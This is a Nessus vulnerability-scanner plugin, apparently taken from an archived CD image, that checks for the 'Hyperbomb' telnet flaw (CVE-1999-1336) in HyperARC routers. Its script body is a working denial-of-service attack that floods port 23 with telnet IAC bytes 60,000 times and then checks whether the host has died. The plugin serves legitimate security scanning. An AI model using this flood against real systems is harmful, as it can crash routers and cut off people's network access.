home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / hyperbomb.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  98 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10108);
  10.  script_version ("$Revision: 1.15 $");
  11.  script_cve_id("CVE-1999-1336");
  12.  name["english"] = "Hyperbomb";
  13.  name["francais"] = "Hyperbomb";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "
  17. It was possible to reboot the remote
  18. host (possibly an HyperARC router)
  19. by sending it a high volume of IACs.
  20.  
  21. An attacker may use this flaw to shut down
  22. your internet connection.
  23.  
  24.  
  25. Solution : add a telnet access list to your
  26. Hyperarc router. If the remote system is not
  27. an Hyperarc router, then contact your vendor
  28. for a patch
  29.  
  30. Risk factor : High";
  31.  
  32.  
  33.  desc["francais"] = "
  34. Il s'est avΘrΘ possible de faire rebooter
  35. la machine distante (sans doute un routeur
  36. HyperARC) en envoyant un grand volume de IACs.
  37.  
  38. Un pirate peut utiliser ce problΦme pour couper
  39. votre connexion α internet.
  40.  
  41.  
  42. Solution : ajoutez une liste d'accΦs α votre routeur
  43. Hyperarc. Si le systΦme distant n'est pas un routeur
  44. alors contactez votre vendeur pour un patch.
  45.  
  46. Facteur de risque : ElevΘ.";
  47.  
  48.  script_description(english:desc["english"], francais:desc["francais"]);
  49.  
  50.  summary["english"] = "Crashes the remote host using the 'hyperbomb' attack";
  51.  summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'hyperbomb'";
  52.  script_summary(english:summary["english"], francais:summary["francais"]);
  53.  
  54.  if (ACT_FLOOD) script_category(ACT_FLOOD);
  55.  else        script_category(ACT_KILL_HOST);
  56.  
  57.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  58.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  59.  family["english"] = "Denial of Service";
  60.  family["francais"] = "DΘni de service";
  61.  script_family(english:family["english"], francais:family["francais"]);
  62.  script_require_ports(23);
  63.  
  64.  exit(0);
  65. }
  66.  
  67. #
  68. # The script code starts here
  69. #
  70.  
  71. start_denial();
  72. port = 23;
  73. if(get_port_state(port))
  74. {
  75.  soc = open_sock_tcp(port);
  76.  if(soc)
  77.  {
  78.   data = raw_string(254, 36, 185);
  79.   for(i=0;i<60000;i=i+1)
  80.   {
  81.    send(socket:soc, data:data, length:3);
  82.   }
  83.   close(soc);
  84.  
  85.  
  86.  #
  87.  # wait
  88.  #
  89.  sleep(5);
  90.  
  91.  alive = end_denial();
  92.  if(!alive){
  93.                 set_kb_item(name:"Host/dead", value:TRUE);
  94.                 security_hole(0);
  95.                 }
  96.  }
  97. }
  98.